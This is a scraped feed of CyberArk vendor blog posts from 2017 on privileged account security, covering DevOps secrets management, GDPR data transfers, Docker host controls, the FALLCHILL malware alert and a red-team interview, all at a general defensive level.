  • Third, micro-segmentation of access to secrets, passwords, SSH keys, etc. is essential in minimizing the impact of any potential breach or event. In fact, the events you should work to minimize are not just security-related (where some malicious actor has gained access to infrastructure) but are also what we call “misadventure,” or human mistakes that are bound to happen. Things are moving so fast in DevOps environments that one could quite literally screw up at the speed of light. You need to have a bit of a throttle, so that when this happens (and it inevitably will), you can easily roll back to a previous environment or rotate a key.

Key Considerations for Privilege and Machine Identities

 One of the key differences in controlling privileged access in a DevOps environment is honing in on the path on which no human user is involved. These privileges are exercised on a daily—even minute-to-minute—basis. Imagine a scenario whereby I’ve written a script, and I can launch instances in AWS from that script and those are all privileged in order to access a key database from my organization. In this instance, there is no human involvement. It could’ve just been a big red button called “deploy here,” and thus, there’s really no traceability back to a human user to identify how this infrastructure got there, where it came from, how it got its permissions, etc. Tools that can specifically recognize and identify machine and system account users and can ultimately authorize them based on policy—and then audit that entire transaction—are crucial for forensic analysis, for governance of least privilege, and for the ability to ensure that you have a security posture consistent with whatever your program or policy might be.

Extending Your Privileged Account Security Programs

Privileged account security is a proactive step you can take to mitigate risk. A crucial first step is to devise a program early on that enables you to curate, and distribute via automation, consistent security policies for access to cloud keys and credentials—in a compliant way. Far too often, organizations scramble to remediate issues, as opposed to implementing solid best practices from the start.

For companies with existing privileged account security programs in place, the goal is to extend those solutions into the next generation infrastructure.  We call this trust forward. Trust forward is the concept that you can leverage existing tools, protocols and existing certified solutions and map them to these next generation workflows. This is possible because best practices around controlling privileged account credentials have built up over decades, some of which cannot be jettisoned as we move into the new world. What we do need to do is acknowledge when they do and don’t work with the new workflows, and that’s key.  Some break-glass, two-key human user escalation workflows should remain in the hands of humans, and not bots, to make the key and critical decisions, with full session recording.

What Your DevOps Colleagues Need to Realize About Security Tools

Some DevOps personnel have had negative experiences with timeliness and delivery of security in the past. So it’s critical that they understand it doesn’t have to be that way—speed, velocity and resiliency do not need to be sacrificed in order to be secure. But it also can’t be bespoke to any one development group’s tools and preferences. The business needs a consistent security and risk posture across all groups, tools and technologies.

From a cultural standpoint, it’s important for DevOps engineers to embrace that their security team has something important to offer in terms of best practices and knowhow.  They have experience and focus to deliver, and they are now being empowered with tools that have been designed with the developer and operations team user experience in mind.  Tools, like CyberArk Conjur, that can effectively bridge the two methodologies and help people to work together collaboratively—and at velocity—to secure their infrastructure. From a technological standpoint, it’s important to think ahead and select best-of-breed solutions that are going to evolve with their infrastructure. Partner with companies that can drive an agenda forward—which may include one set of tools today and an entirely different set of tools tomorrow.

Security teams can work with built-for-purpose security tools that provide a strong foundation on which to build.  That’s why CyberArk is boosting its education efforts within the DevOps and Security communities about best practices in the evolving technology landscape of cloud, containers and micro-services/serverless—to empower teams to craft programs and policies that can be used to deploy and secure cloud assets in a consistent, scalable way.

Editor’s Note: CyberArk Conjur, part of the CyberArk Privileged Account Security Solution, helps organizations keep up with the rapidly shifting DevOps landscape. To learn more, visit here.

]]>
Protecting Cross-border Data Transfers for GDPR https://www.cyberark.com/blog/protecting-cross-border-data-transfers-gdpr/ Fri, 01 Dec 2017 17:23:50 +0000 https://www.cyberark.com/?p=20078/

Corporate legal counsels, technology providers, IT professionals – and anyone else paying attention to the General Data Protection Regulation (GDPR) – would undoubtedly agree that the requirements within the 99 Articles of the regulation present a laundry list of necessary changes many organizations will need to make to avoid non-compliance. The one we want to highlight in this blog calls for an adequate level of protection to be implemented for cross-border data transfers. Article 45, ‘Transfers on the basis of an adequacy decision’ specifically states:

“A transfer of personal data to a third country or an international organization may take place where the Commission has decided that the third country, a territory or one or more specified sectors within that third country, or the international organization in question ensures an adequate level of protection.”

This complicates things in the world of international commerce. Here in the United States, the Department of Commerce has nixed the U.S.-EU Safe Harbor Framework (following a decision by the Court of Justice of the European Union) and replaced it with a new framework, the EU-U.S. Privacy Shield. This new framework better aligns to the very detailed and specific requirements of GDPR, and it will allow companies within the United States and the European Union to successfully execute transatlantic data transfers.

Any country, governmental body or organization that turns a blind eye to this requirement will subsequently have their respective data transfers blocked by this legislation.  Most importantly, by not having an ‘adequate level of protection,’ basically means the chances of being subjected to a personal data breach increase considerably. Which as we all now know, introduces severe financial and reputational consequences.

With CyberArk The Privileged Account Solution Version 10, we’ve made significant enhancements that enable customers to better meet the requirements in storing session recordings for cross-border data transfers. Our customers now have the ability to securely store privileged session recordings on regional-based storage, as opposed to storing them in a Digital Vault, which might be globally dispersed or more likely, outside the European Union. This is especially important for monitored database sessions, where client data has the potential to be revealed as a consequence of a command executed by an administrator.   

This change applies to both processor and controller requirements and benefits customers that have a need to lock down their session recordings and ensure they do not leave a specific region (see Figure 1). This new capability goes beyond the requirements of GDPR and equally applies to local secrecy acts such as the Singapore Banking Secrecy Act, which prohibits (without permission) the export of client data outside of the region.

 

Figure 1. CyberArk now provides the ability to store privileged session recordings on dedicated, regional-based external storage.

It’s important for organizations to only provide authorized users with access to these recordings, ensuring that any playback processes are consistent with the data isolation requirements. Additionally, it’s critical to protect the integrity of these privileged session recordings for digital forensics in the case they should ever be needed for a legal proceeding. To support the security, integrity and validity of these session recordings, the following capabilities have been enforced with CyberArk Privileged Account Solution Version 10:

  • Secure Communication – The communication between the Privileged Session Manager, the storage devices and the CyberArk user interface for the recordings replay is performed via a secure protocol.
  • Managed Authorization – Only authorized users in the Vault will be able to access the session recordings through CyberArk systems.
  • Searchable Audit Records and Streamlined Video Replay – The actual location of the video is transparent to the authorized user (e.g. auditors and reviewers) and provides the exact same user experience for both vault-stored recordings and externally stored recordings.
  • Maintenance Users Protection – The CyberArk Privileged Account Security Solution will be used for authorizing and monitoring maintenance users’ access to the secure storage.

These enhancements show CyberArk’s dedication to helping organizations avoid non-compliance with GDPR. The CyberArk Privileged Account Security Solution can be critical for your organization to advance securely in an increasingly dynamic, competitive business environment. Be sure to visit our website for more information on how CyberArk solutions can help support your GDPR strategy today.

]]>
Painful Lessons Breaches Teach Us About DevOps and Security https://www.cyberark.com/blog/painful-lessons-breaches-teach-us-devops-security/ Tue, 28 Nov 2017 20:31:38 +0000 https://www.cyberark.com/?p=19928/

Cloud and DevOps are critical technology engines helping to power transformational advances across many businesses. Most of us in IT, security and development know that there are secrets and credentials in cloud and DevOps environments that must be protected. Despite this knowledge, we continue to see incidents that expose private data. The recent Uber breach serves as a timely reminder of the need to protect credentials and the damage that happens when they are not protected.

Incidents Exposing Private Data Are Becoming Regular Occurrences

Unfortunately, breaches continue to occur with an alarming frequency and with damaging and potentially devastating results. This is especially true for consumer-facing businesses where trust is an important ingredient. Last week, Uber revealed that an attacker had gained access to some 57 million driver records and other data. This breach is far from being an isolated example. Last summer, it was reported that millions of customer and personnel records were exposed inadvertently in three separate instances. In these cases, third-party contractors misconfigured S3 storage buckets for public access – this happened at a military contractor, a leading wireless provider, and a top cable TV provider, and like the Uber breach, each made the news.

We don’t know the details, but reportedly the Uber data was exposed because the AWS access keys were embedded in code that was stored in an enterprise code repository by a third party contractor. A clear takeaway is that no code repository is a safe storage place for credentials.

Cloud and DevOps Raise the Stakes Significantly

In today’s fast-paced, agile world, it’s dangerous, and increasingly, consumers, regulators and markets find the resulting breaches to be costly and unacceptable. As a result of breaches, you can see hundreds of millions potentially lost in market capital, a dip in consumer trust—which is a critical enabler of the sharing economy—and careers can in some cases be over or stalled. Maybe it’s an exaggeration to say that some digital businesses put their entire business at risk by inadvertently publishing a single key to their critical data, but it certainly hurts and opens up opportunities for competitors.

By Enforcing Least Privilege, Many of These Incidents Are Potentially Preventable

The frustration is that many of these problems are predictable and could be mitigated with effective and available solutions. While no solution can be 100% effective, secrets management solutions are used by some very large and security savvy organizations. These businesses want the velocity benefits provided by DevOps and cloud computing, and they take extra measures to ensure they do not expose their organizations to increased risk. These enterprises are achieving agility AND security.

It is becoming a cyber security best practice to eliminate secrets, such as AWS root credentials and access keys from any public or private source control system and other plaintext locations where they could be misappropriated by a malicious actor. Some organizations mistakenly think that source control will protect them, but it simply won’t. Source control is not a security tool nor is it an appropriate location for storing sensitive passwords, secrets and access keys.

Take Control and Prevent Incidents

CyberArk products, including CyberArk Conjur which is specifically designed to help secure DevOps pipeline, provide secure credential vaulting for AWS, Azure, and other public clouds, and an access controlled workflow for delivery of secrets “just in time” to the application run time environment via automation. Automation is a key element because it takes developers and other humans out of the role of being the responsible party for deciding where and how to store sensitive secrets and credentials used by CI/CD tools, applications and other IT systems.

With CyberArk Conjur, secrets and credentials, including cloud root credentials and access keys, can be secure, controlled and managed—and removed from the software development and delivery systems, including public and private repositories such as GitHub. Developers, including third-party contractors, can easily integrate and deploy Conjur into the code that they write to access secrets and credentials when they are required. This enables organizations to almost completely avoid exposing the actual secrets, keys and credentials to any human or code and reduce risk. The CyberArk solution enables security and IT organizations to control and manage the secrets and keys which give access to the corporate and customer data that organizations don’t want to expose.

There are lots of other benefits from deploying a secrets management solution for DevOps and cloud. These benefits include usage monitoring, automated key rotation, tracking of identification of suspicious activity, audit and establishing compliance controls.  All of these are very powerful and designed to prevent the types of event that Uber experienced and ensure safe application development and deployment environments in the cloud.

It’s Easy to Get Started

Attend a CyberArk DevOps workshop, talk to one of our DevOps experts, schedule a demo, or start using CyberArk DevOps Solutions. Integrated with many of the leading DevOps tools, CyberArk Conjur is available in several versions, including a free and open source solution for developers. CyberArk Conjur Enterprise offers a highly scalable enterprise product that extends the open source version to include many additional features, including integration with the CyberArk Vault. Additionally, CyberArk Professional Services can be used to jump start securing cloud and DevOps environments with 30 Day Sprint methodologies. Our goal is to help organizations secure their DevOps and cloud environments. For more information contact CyberArk.

 

]]>
Turning up the Heat on “FallChill” https://www.cyberark.com/blog/turning-heat-fallchill/ Mon, 20 Nov 2017 15:42:23 +0000 https://www.cyberark.com/?p=19667/

US-CERT, in coordination with the FBI and Department of Homeland Security, recently released technical details of a remote administration tool (RAT) known as “FALLCHILL,” used allegedly by the hacker group “Hidden Cobra.” According to the alert, this attack tool has been in the wild since early 2016 and has been used as a launching point for major cyberattacks.

Regardless of where the malware originated, FALLCHILL is an example of how attackers continue to exploit enterprise weaknesses and a failure to adhere to cyber security best practices.  With respect to FALLCHILL, targets fall victim to compromised websites that trick users into inadvertently downloading, installing and running this RAT onto the target system, or it is downloaded by other malware as the communication mechanism on the target system. Once on board, it then acts as C2 server communicating back to the attackers through a series of proxies.

Once installed, FALLCHILL, like all other RATs acts like the end user and can reside undetected and install other attack tools that further exploit endpoints that enable the attacker to access other systems by compromising and stealing credentials. Once this happens, the attacker moves laterally to other systems leveraging stolen credentials.

In the alert, US-CERT highlights mitigation strategies that every organization should implement immediately – regardless of whether they’re a target of Hidden Cobra or another form of malware. These mitigation strategies include leveraging the principles of least privilege, implementing application control and disabling macros, along with keeping up to date on security patches and AV definitions.

Taking a closer look at the recommendations, application control, combined with the removal of administrative rights from all endpoints has proven to be effective at preventing the installation of malware and other malicious applications. This approach eliminates the ability to steal and exploit privileged credentials to facilitate lateral movement or to download additional of malicious apps like Mimikatz, which is commonly used to steal and harvest credentials from various endpoint credential stores.

Looking beyond the recommendations, credential theft protection can help to guard against attacks from malware like Mimikatz and others to stop the spread of malware by stopping access to credential stores in the Windows Operating system and other credential caches found on endpoints such as browsers and SSH keys. Furthermore, unknown applications can be grey listed to eliminate their ability to communicate back to their attackers, and when used in conjunction with a malware analysis engine such as the newly-released Application Risk Analysis Service from CyberArk, these steps can help streamline decision making around application control policies.

The new CyberArk Application Risk Analysis Service extends capabilities of CyberArk Endpoint Privilege Manager through machine learning and cloud-based analytics to help stop attackers from gaining a foothold on endpoints by detecting potentially malicious applications, which enables timely, well-informed privilege and application control policy decisions. To learn more, visit https://www.cyberark.com/best/.

]]>
CyberArk V10 Expands Cloud and DevOps Security Capabilities, Including Support for Google Cloud Platform https://www.cyberark.com/blog/cyberark-v10-expands-cloud-devops-security-capabilities-including-support-google-cloud-platform/ Mon, 20 Nov 2017 14:55:29 +0000 https://www.cyberark.com/?p=19663/

With the launch of the CyberArk Privileged Account Security Solution v10, CyberArk is expanding cloud platform support beyond Amazon Web Services (AWS) and Microsoft Azure to include Google Cloud Platform (GCP). Now, customers can take advantage of using the CyberArk Privileged Account Security Solution to secure workloads running on any of the three leading cloud platforms. This provides organizations with more flexibility in choosing which cloud platforms to run their cloud workloads on, and enables organizations using multiple cloud platforms to establish a single control point to manage the credentials of cloud administrators, developers and other users accessing the management consoles and portals of the various cloud platforms.

A typical GCP configuration for CyberArk could include running the primary and disaster recovery vaults, and session monitoring to secure cloud workloads running in a native GCP environment. Alternatively, organizations can extend their existing CyberArk deployment (e.g., running on-premises or on the AWS or Azure cloud) to also help secure access to the GCP Cloud Console and secure the GCP workloads.

CyberArk also offers various plugins, including for the GCP management portal, to make it easier for customers to configure CyberArk to manage access to the various cloud management consoles and portals.

In the v10 release, CyberArk also offers additional DevOps and cloud capabilities including automating the onboarding and management of credentials for newly created EC2 compute instances. This capability uses CyberArk’s integration with AWS CloudWatch and automatically manages the SSH keys for instances created and terminated by AWS Auto Scaling, DevOps tools as well as manually from the console or with scripts. Two new whitepapers are available to explain the offer and benefits: Securing Hybrid Cloud Environments and Workloads on Amazon Web Services (AWS) and Securing the Enterprises Cloud Workloads on Microsoft Azure.

CyberArk with be at AWS re:Invent (booth #619) and the Gartner Identify and Access Management (IAM) Summit (booth #219), both in Las Vegas the week of November 27th. If you will attend either of these events, be sure to stop by for a demo of CyberArk’s new Cloud and DevOps capabilities and to discuss your organization’s cloud journey. CyberArk is speaking on Securing Cloud and DevOps Environments at Gartner IAM on 11/28 at 3:45-4:30 pm.

]]>
CyberArk Unveils v10 – Simplicity, Automation, Risk Reduction https://www.cyberark.com/blog/cyberark-unveils-v10-simplicity-automation-risk-reduction/ Wed, 15 Nov 2017 05:01:43 +0000 https://www.cyberark.com/?p=19317/

The iPhone is not the only v10 to be released this year! As a product leader, I am not sure if splitting the release of the iPhone 8 from the release of the iPhone X was an example of Apple’s marketing genius or not, but as an Android user, I’ll observe the results from a safe distance. I will save my thoughts on the merits of the Android over the Apple for another day.

What I am very excited about, however, is the latest release of the CyberArk Privileged Account Security Solution.  Like Apple, we’ve achieved a milestone of sorts with a v10 of our own (and unlike Apple, we actually delivered a v9!). Nearly a 12-year veteran of CyberArk, I can honestly say this release is one of my proudest moments, right up there with the global recognition and debut of CyberArk on the NASDAQ in September of 2014 and the previous introduction of Threat Analytics capabilities. What really makes this release stand out for me is our unwavering focus on two big themes: simplicity and automation.

As the #1 market share leader in privileged account security, we push ourselves to always do better by our customers, and with this v10 release, we have delivered!  After spending countless hours engaging with and soliciting input from our customers and partners—not to mention organizing extensive usability and beta testing—we are unveiling a brand new, modernized user interface (UI) that is elegant, clean and simple. Here is a sample of what one of our customers, a senior consultant at a global financial services organization had to say:

 “The new user interface and account management features will dramatically facilitate adoption and ease-of administration, providing a better experience for our end users, and saving our IT staff valuable time by simplifying day to day management tasks.”

The new v10 UI offers a simplified view of account management that reduces time spent on common tasks for operation teams by 10x and the time it takes auditors to review sessions recordings has decreased by 5x. All of this means simpler and faster deployment, allowing operations and auditor teams to spend their time on value-add endeavors!

On the automation front, we’ve fully embraced that we now live in an API-first digital world.To that end, our new and improved REST APIs make it even easier to integrate CyberArk solutions with existing security, operations and DevOps tools. A good example of this is a new integration with AWS CloudWatch and Auto Scaling that automates onboarding to enable security teams to save time and reduce the risk of unmanaged SSH keys.

Along with our big focus on simplicity and automation, we continue to stay true to our corporate mission to reduce risk associated with privileged accounts wherever they exist, whether on-premises, in the cloud or in DevOps workflows. The AWS integration is great example of this since manually provisioning SSH keys just doesn’t work with modern, elastic scaling infrastructure.

On the endpoint, where many damaging attacks start, we have further enhanced our Endpoint Privilege Manager to deliver a new cloud-based Application Risk Analysis Service, which enables timely, well-informed privilege and application control policy decisions. We’ve also extended support to the Mac, a platform that is increasingly adopted in the enterprise.

Unlike the release of iPhone, you don’t have to set up a tent outside of a big glass store for the next big release from CyberArk. You can learn all about it here and sign up for our upcoming webinar covering all of the great details from this latest release. Stay tuned for upcoming blog posts that will provide additional details on what we’ve delivered, since there are a lot of great new capabilities in this release that I did not have the real estate to cover here.

]]>
7 Types of Privileged Accounts: Service Accounts and More https://www.cyberark.com/blog/7-types-privileged-accounts-know/ Wed, 01 Nov 2017 13:47:49 +0000 https://www.cyberark.com/?p=18927/ What is a service account, managing privileged accounts, privileged user management

Privileged accounts exist in many forms across the enterprise environment and they pose significant security risks if not protected, managed and monitored. The types of privileged accounts typically found in an enterprise environment include:

  1. Local Administrative Accounts are non-personal accounts that provide administrative access to the local host or instance only. Local admin accounts are routinely used by the IT staff to perform maintenance on workstations, servers, network devices, databases, mainframes, etc. Often, for ease of use, they have the same password across an entire platform or organization. Using a shared password across thousands of hosts makes local administrative accounts a soft target that advanced threats routinely exploit.
  2. Privileged User Accounts are named credentials that have been granted administrative privileges on one or more systems. This is typically one of the most common forms of privileged account access granted on an enterprise network, allowing users to have administrative rights on, for example, their local desktops or across the systems they manage. Often these accounts have unique and complex passwords. The power they wield across managed systems makes it necessary to continuously monitor their use.
  3. Domain Administrative Accounts have privileged administrative access across all workstations and servers within the domain. While these accounts are few in number, they provide the most extensive and robust access across the network. With complete control over all domain controllers and the ability to modify the membership of every administrative account within the domain, having these credentials compromised is often a worst case scenario for any organization.
  4. Emergency Accounts provide unprivileged users with administrative access to secure systems in the case of an emergency and are sometimes referred to as ‘firecall’ or ‘breakglass’ accounts. While privileged access to these accounts typically requires managerial approval for security reasons, it is usually an inefficient manual process that  lacks any auditability.
  5. Service Accounts can be privileged local or domain accounts that are used by an application or service to interact with the operating system. In some cases, these service accounts have domain administrative privileges depending on the requirements of the application they are being used for. Local service accounts can interact with a variety of Windows components, which makes coordinating password changes difficult.
  6. Active Directory or Domain Service Accounts make password changes even more challenging, as they require coordination across multiple systems. This challenge often leads to a common practice of rarely changing service account passwords, which represents a significant risk across an enterprise.
  7. Application Accounts are accounts used by applications to access databases, run batch jobs or scripts or provide access to other applications. These privileged accounts usually have broad access to underlying company information that resides in applications and databases. Passwords for these accounts are often embedded and stored in unencrypted text files, a vulnerability that is replicated across multiple servers to provide greater fault tolerance for applications. This vulnerability represents a significant risk to an organization because the applications often host the exact data that APTs are targeting.

For information on how to protect privileged accounts, please read the rest of our brief guide, which also highlights best practices: “The Three Phases of Securing Privileged Accounts.” You can also find guidance on how to prioritize your approach for effective, risk-based privileged access management.

]]>
Countdown to GDPR: Protecting the Pathways to Personal Information https://www.cyberark.com/blog/countdown-gdpr-protecting-pathways-personal-information/ Tue, 24 Oct 2017 18:22:46 +0000 https://www.cyberark.com/?p=18612/

The General Data Protection Regulation (GDPR) goes into force on May 25, 2018, yet despite the rapidly approaching deadline, many organizations are still either confused about or unprepared for this sizable piece of legislation.

To help organizations better prepare for the upcoming changes, while underscoring the strategic business value of securing access to personal data, we’ve developed a GDPR Advisory series, which is now available. The series outlines practical steps for meeting GDPR requirements for protecting personal data, including protecting access, responding rapidly, assessing risk and demonstrating compliance.

Protecting the Pathways to Personal Information

As we’ve covered in previous posts, a cyber attacker typically follows the privileged pathway leading to an organization’s most sensitive assets and information. To protect your organization, you must tightly control your pathways to privileged access, so unauthorized users are blocked on the spot—whether they are malicious or mistaken.

 Privileged “users” including employees and third parties—even certain applications or processes—all have access to this pathway, and therefore, personal data. You are now responsible for all of these under GDPR.

 Our first GDPR Advisory delves into the specific articles within the GDPR legislation that outline who, or what, can (and cannot) have privileged access to personal data. For example:

  • GDPR Article 25 requires protection of personal data by design and by default: We’ll explore how implementing the “least privilege principle” can limit user access to the minimal level of data that allows normal business functions and significantly strengthens operational control over access to personal data.
  • GDPR Article 32(2) says organizations must protect against the accidental or unlawful destruction, loss, alteration or access to personal data: We’ll outline proactive steps you can take to comply with this article, including placing privileged credentials in a secure digital vault and enforcing individual accountability for each action taken using those credential—at any point in time.

Strong privileged account security requires more than the management of individual users’ passwords. You also need to comprehensively isolate, control and monitor privileged access across systems, databases and VMs. We’ll explore an actionable “checklist” of steps to secure system access and stop attackers and malicious insiders from leveraging compromised credentials to bypass monitoring solutions and security controls.

Read the full GDPR Advisory here. To learn more about protecting your pathways to personal information, contact your sales representative or visit here to learn how CyberArk can help your organization with GDPR readiness.

]]>
Secure and Protect Docker Hosts with CyberArk https://www.cyberark.com/blog/secure-protect-docker-hosts-cyberark/ Mon, 16 Oct 2017 13:03:18 +0000 https://www.cyberark.com/?p=18261/

Container technology has been instrumental in the transformation of application development and deployment, and Docker has held the pole position. The reasons include Docker’s ease of installation and use, and its ability to automate common tasks so developers can focus on what matters: building great software. Overall Docker adoption has surged 35% within the last 12 months which is a clear indication that developers see its value and significance. Container technology is very agile. It’s ingrained in the DevOps pipeline and woven into various cloud architectures. However, this technology does create a cause for concern for both developers and security practitioners alike, as it presents yet another platform to secure and protect. Adopting emerging technologies often make security an afterthought, and the modern use of containerization makes no exception.

Protect the host, protect the deployment

There are many moving parts that make up the Docker platform, but in this blog, I’ll focus on the Docker Host and the importance of keeping it protected. Within the Docker Host exist three primary components: the Docker daemon, containers and images. The Docker daemon is a service that runs on the host OS and manages both the containers and images. It looks out for API requests from Docker and also acts as the communication layer to manage other services within Docker (see Figure 1). Most companies have defined roles within the organization that provide wide-ranging levels of access to the Docker Host for a variety of usages (e.g. managing containers, creating new images and getting real-time events from the server).

Figure 1. Docker’s client-server architecture

Now, there are more than 50 commands that can run within the Docker command-line interface. Among them include the building images from a Dockerfile (docker build), the creation of a new container (docker create), and the ability to terminate one or more running containers (docker kill). Why is this important? Well, would you want every developer, DevOps or IT operations team member within your organization to have the ability to execute some of these potentially risky commands in your container environment? Probably not. Furthermore, there’s a significant privileged escalation risk that lies at the container level. If a user were able to compromise a root account, they’d have the potential to elevate privileges to gain access to the Docker Host which can be the first step prior to rolling out a full-fledged attack that could put all of the containers at risk.

A few best practices

By implementing the principle of least privilege as well as incorporating separation of duties (SoD) controls, you can protect your modern Docker infrastructure without negatively impacting business efficiency or increasing operational costs. With the introduction of the principle of least privilege, you’re reducing the overall need for root accounts for many different use cases, which in turn, improves your organization’s security posture. Take it one step further by installing CyberArk On-Demand Privileges Manager on every Docker Host. A set of role-based permissions can be established which will run only the minimum commands required to perform the necessary tasks that each user’s job function requires – and nothing more (see Figure 2).

Figure 2. Set policies to limit the actions of privileged users on Docker Hosts

These predefined commands can be set for use by specific groups or personas such as Docker Dev, Docker Ops and Docker Security. The policies can be defined via white-listing or black-listing to provide maximum flexibility in achieving your organization’s desired restriction level. All of the elevated commands can then be audited and monitored allowing security and auditing teams to gain full visibility into your organization’s activity. What if you need to allow root user access to the Docker Host in specific scenarios? It’s a best practice to first centrally manage the root credentials and then introduce an isolation layer between root users and the Docker Host to prevent credential hijacking. You can implement approval workflows and apply further restrictions on the root user’s activities as needed.

Tracking what a root or other power user is doing once they’ve opened a privileged session to the Docker Host is critically important. CyberArk can secure all of this access, record and log all of the activity that occurs, as well as alert on potential threats to your Docker Hosts. Moreover, with CyberArk Conjur you no longer have to guess what’s happening within your Docker Host and containers. Even with many containers being brought up and down in ephemeral environments, you can gain full control and audit over which secrets each container or application can access. Based on an enterprise policy, every container/host/application is allowed access only to authorized resources, using its own machine identity. Every access is audited, and you can see the Docker role groups fall under compliance. Additionally, you can see all of your Docker users connected live to the Docker Host, so your organization never has to go blind into containerization again.

These are just a few examples of how CyberArk solutions will bolster your container platform security. Arm your security team. Empower your developers. Find out more by contacting a CyberArk expert for a full product and solution demo.

]]>
Three Key Steps for Locking Down Critical Privileged Accounts https://www.cyberark.com/blog/three-key-steps-locking-critical-privileged-accounts/ Fri, 13 Oct 2017 14:03:55 +0000 https://www.cyberark.com/?p=18198/

Let’s cut to the chase: Most IT professionals understand cyber attacks will happen, and it’s simply a matter of when. Every major breach has a common denominator: compromised privileged accounts. They are an essential element of the attack lifecycle and must be secured.

I recently presented a webcast on three key steps organizations can take to protect their most critical privileged accounts. Here’s an overview of each of these steps:

Take Control: Locking Down Credentials and Endpoints

Locking down credentials and endpoints is a crucial first step in an environment that does not have privileged credential security in place. The hardest part is figuring out where to start. You’ll need to identify and prioritize which accounts present the greatest risk and therefore need to be locked down first.

  • Credential The first step is to figure out exactly where your account credentials actually “live” within your environment. Only then can you truly understand which ones need to be locked down immediately and which ones can be de-provisioned. For example, your organization may currently have 150 separate domain admin accounts that can feasibly be trimmed down to one or, at the minimum, just a handful.
  • Endpoints. They continue to be attractive entry points for attackers. Identifying users with local administrator rights and removing those rights is a critical first step to securing your organization’s endpoints. From there, you can create policies against those endpoints. For example, you can dictate which applications can run in administrative mode and which ones cannot. Least privilege and application control are best practices to follow and a strong defensive combo.

Often, the discovery process is easier said than done. The average organization has 3X to 4X more privileged accounts than employees. Tools such as CyberArk DNA can help streamline the arduous process of discovering privileged accounts—on-premises or in the cloud, assessing privileged account security risks to help you prioritize actions and identify accounts with local admin rights. Using such a tool, you can also pinpoint embedded and hard-coded credentials stored within applications and uncover which machines are vulnerable to credential theft attacks, such as harvesting, Pass-the-Hash, Overpass-the-Hash and Golden Ticket. Discovery tools are particularly helpful in cloud environments. For example, in AWS or Azure, organizations can quickly find and identify AWSIM rules, users, Access Keys and EC2 Key pairs.

Once you identify where these credentials are, you can take ownership and action by placing them in a secure space or vault.

Isolate and Control Sessions

Once all of these critical accounts are located within a vault, it’s time to turn your attention to usage control. In today’s collaborative environment, many people need access to privileged accounts—from third-party contractors to temporary employees and more. Solutions such as CyberArk Privileged Session Manager can help manage and monitor privileged account sessions without impacting the end-user experience OR disrupting system administrators’ workflow. It allows users to connect to target systems within their environment via an agentless jump server. This isolates the user from the target systems’ passwords (ensuring credentials never reach endpoints) while enabling authorized access so s/he can perform necessary duties. Meanwhile, the secure vault keeps the passwords hidden and protected and rotates them (either each time they are used or on a set scheduled cycle). Monitoring and recording capabilities enable security teams to track user activity, pinpoint suspicious privileged sessions and immediately terminate them, as needed.

A key, added bonus is that organizations can continue to leverage native tools such as Putty, remote desktop connection manager, etc. CyberArk can configure these tools to be able to go through the CyberArk proxy channels to get to those target systems without introducing a lot of latency between the user and the job that they’re there to do.

Keep a Watchful Eye

The last step is keeping a watchful eye and making sure that you understand where anomalies are actually taking place in the day-to-day routine. For example, does John typically work from 8:00 to 5:00, but suddenly starts to check out passwords at 2:00 a.m.?  Was that really even John, or was it someone else?  Or, what if John normally checks out 10 to 15 passwords per day, then all of a sudden he starts checking significantly more?

But it’s not just user behavioral analytics—it’s also environmental. What happens if we can detect the very first time that someone is able to compromise the system by brute-forcing their way in as an administrator or another admin account?  Or creating a backdoor account and then logging into it at strange hours?

CyberArk Privileged Threat Analytics is a security intelligence system that allows organizations to detect, alert and respond to attacks targeting privileged accounts. It is designed to identify an attack in real-time and automatically respond to stop an attacker from moving laterally to advance the attack. Because in order to move laterally, the attacker needs to have the necessary credentials to escalate privileges. CyberArk individualizes every single password, and therefore, stops the lateral movement and shuts down the pathway. With CyberArk, organizations can set baselines and create thresholds for anomalies and get notifications immediately on true security events, which helps to lower the alert volume. Additionally, taking advantage of integrations—or tools that speak fluently with each other—helps to minimize alert fatigue.

For additional details on the attack lifecycle and how privileged accounts come into play, along with common hurdles to establishing the most effective protection, I invite you to view the on-demand presentation.

]]>
Think Like an Attacker and Improve Your Defensive Strategy https://www.cyberark.com/blog/think-like-attacker-improve-defensive-strategy/ Thu, 05 Oct 2017 12:50:23 +0000 https://www.cyberark.com/?p=17853/

The CyberArk Red Team is a highly qualified group of industry veterans who are trained to use “any means necessary” – just as an attacker would – to help security operations teams identify and measure which threats they can detect – and which ones they cannot.

In a recent post, we asked Shay Nahari, our Head of Red Team Services, about the process and goals of simulated attacks. In this exchange, we ask additional questions about an attack simulation and his team’s approach. Here are some highlights of our conversation:

Q: How do organizations test internal and external systems, so that the exercise successfully mimics real attacks?

A:  If you examine real-world breaches, you can see that adversaries are always thinking – and operating – in terms of goals, such as stealing intellectual property or financial records. With traditional penetration testing, you would have someone scan to pinpoint specific vulnerabilities, such an unpatched windows system, on the network. While this is certainly an important vulnerability to know about, advanced attackers simply don’t think like this. They are goal-driven and will try multiple times until they get into the network and on to the path that will lead them to the crown jewels. This is done by hunting for privileges that will allow them to move around on the network. Make no mistake – attackers will get in. Operating under the assumption that you’ve already been breached is the first step in improving your organization’s security posture.

Q: During Red Team adversarial simulation testing, are you asked to breach the perimeter or do begin the exercise on the inside?

A: While we’ve done both forms of testing, we preach to “assume breach,” so we most often start from within the network, on a VM or an internal user’s laptop, for example. There is always a way to get into the network either through exploiting an external facing device or through social engineering.

Q: In your attack simulation, you created a connection back to a C2 server to carry out the initial breach. What are some of the ways to gain network access?

A: We work to gain access in a variety of ways, such as deploying malicious codes in enterprise applications or abusing inherent trust both externally and internally to gain a foothold. Examples include phishing with an HTA file, link or macro embedded document to multiple people within the organization. All of these methods will lead to in-memory execution of our payloads. Once we’ve infiltrated the network, we’ll abuse trust, like credentials, misconfiguration or software vulnerability to escalate privileges locally. Attackers are lazy – they will usually choose the path of least resistance. Humans are always the easiest option to exploit.

Q: So, attackers will try to steal credentials from a compromised machine?

A: There are multiple credential locations within Windows – some of them are within windows credentials managers, user history, applications and even Outlook. Microsoft has done a lot of work to harden these locations (particularly from v8.1 on), but attackers continue to innovate, and they have found ways to circumvent these protections. If there is a privileged credential on a machine, it’s almost impossible to stop an attacker from stealing it and using it to help achieve his/her goal. That’s why it’s so important to ensure workstations don’t contain privileged accounts within the network.  

(Editor’s note: CyberArk Endpoint Privilege Manager helps organizations to block and contain attacks at the endpoint, reducing the risk of information being stolen or encrypted and held for ransom. A combination of privileged security and application control reduces the risk of malware infection. Unknown applications run in a restricted mode to contain threats and behavioral analysis blocks credential theft attempts. These critical protection technologies are deployed as a single agent to strengthen existing endpoint security. It also enables security teams to enforce granular least privilege policies for IT administrators, helping organizations to effectively segregate duties on Windows servers.)

